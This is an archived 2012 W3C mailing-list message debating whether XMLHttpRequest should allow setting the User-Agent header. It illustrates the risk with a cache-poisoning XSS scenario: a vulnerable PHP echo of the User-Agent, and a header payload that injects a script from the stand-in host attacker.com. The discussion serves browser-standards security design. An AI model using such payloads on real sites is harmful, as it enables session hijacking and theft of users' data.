
Re: [XHR] Open issue: allow setting User-Agent?

From: Hallvord Reiar Michaelsen Steen <hallvord@opera.com>
Date: Tue, 16 Oct 2012 14:44:49 +0200
To: "Jungkee Song" <jungkee.song@samsung.com>, "Boris Zbarsky" <bzbarsky@mit.edu>
Cc: "Julian Aubourg" <j@ubourg.net>, public-webapps@w3.org
Message-ID: <75bcb8cb7dfb1efe3570de97c3ac8353@opera.com>
> While true, a third party can already do this with things like botnets, 
> no?  I'm not sure I see the additional threats here.  Can you explain?



Consider a "valuable target" site, victim.com, which has enabled CORS for a subset of its pages, say /publicdata/index.htm. These pages also contain some debug output in a comment that the developers never thought to disable, say this in one of their PHP backend scripts:


<?php echo '<!-- '.$_SERVER['HTTP_USER_AGENT'].'-->';?>
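To make the injection concrete, here is a small sketch (plain JavaScript, runnable anywhere; the variable names are mine) of what that debug echo produces once the attacker's header value is reflected into the page:

```javascript
// Illustrative sketch: what victim.com's debug echo emits when the
// User-Agent header carries the attacker's payload.
const payload = '--><script src="http://attacker.com/malice.js"></script><!--';

// Equivalent of the PHP: echo '<!-- '.$_SERVER['HTTP_USER_AGENT'].'-->';
const page = '<!-- ' + payload + '-->';

// The payload closes the open comment, injects a live <script> tag, and
// opens a new comment that swallows the trailing '-->':
console.log(page);
```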


Now, the attacker wants to abuse your current logged-in session with victim.com to steal some data, such as the credit card number shown on your profile page. The attacker therefore tricks you into visiting a special page which does



xhr = new XMLHttpRequest();
xhr.open('GET', 'http://www.victim.com/publicdata/index.htm'); // open() must be called before setRequestHeader()
xhr.setRequestHeader('User-Agent', '--><script src="http://attacker.com/malice.js"></script><!--');


and then sends the request for /publicdata/index.htm. Once the request reaches readyState 4, the attacker's page does


location.href='http://www.victim.com/publicdata/index.htm';


The browser has a fresh copy (loaded by the XHR request just milliseconds ago) and serves the page from cache. Voila: the browser is now rendering a victim.com page with a link to malice.js included, and the attacker can do whatever he likes from the JS now running in the scope of the site.


Now, per CORS the victim.com site would have to opt in to a customized User-Agent header. The browser would send a preflight with


Access-Control-Request-Headers: User-Agent


and the server would have to opt in by returning a header saying


Access-Control-Allow-Headers: User-Agent


so the threat scenario relies on the remote server being careless enough to opt in, and yet also careless enough to echo non-sanitised User-Agent strings back into the page. That is basically the negotiation scenario Julian earlier said he would agree to, and the reason I'm still pondering whether it would be worth the extra complexity to allow it for cross-domain requests only... but this sort of "cache poisoning" scenario is a concern.
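For what it's worth, that negotiation boils down to something small. Here is a sketch (plain JavaScript; the function name is mine, not from any spec) of the preflight check: the request only proceeds if every header the page asked for is echoed back in Access-Control-Allow-Headers:

```javascript
// Hypothetical sketch of the CORS preflight header check, reduced to a
// pure function. Header-name comparison is case-insensitive, as in HTTP.
function preflightAllows(requestedHeaders, allowedHeaders) {
  const allowed = allowedHeaders.map(h => h.toLowerCase());
  return requestedHeaders.every(h => allowed.includes(h.toLowerCase()));
}

console.log(preflightAllows(['User-Agent'], ['User-Agent'])); // true: server opted in
console.log(preflightAllows(['User-Agent'], []));             // false: browser blocks the request
```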


Perhaps navigating to a URL that was previously loaded with CORS should always consider the existing cache entry stale and fetch a new copy from the server? This threat scenario may be more general than User-Agent headers in particular. I guess Anne can comment on that; he knows CORS better.
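In browser-internal terms that suggestion might look something like this sketch (all names here are made up; no real browser exposes its cache this way):

```javascript
// Hypothetical sketch of the proposed mitigation: record on each cache entry
// whether it was populated via a CORS request, and treat such entries as
// stale when a top-level navigation later hits the same URL.
function shouldBypassCache(cacheEntry) {
  return cacheEntry.loadedViaCORS === true;
}

const corsEntry = { url: 'http://www.victim.com/publicdata/index.htm', loadedViaCORS: true };
const plainEntry = { url: 'http://www.victim.com/other.htm', loadedViaCORS: false };

console.log(shouldBypassCache(corsEntry));  // true: a navigation would refetch from the server
console.log(shouldBypassCache(plainEntry)); // false: normal cache rules apply
```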

-- 
Hallvord R. M. Steen
Core tester, Opera Software
Received on Tuesday, 16 October 2012 12:51:52 GMT

This archive was generated by hypermail 2.3.1 : Tuesday, 26 March 2013 18:49:55 GMT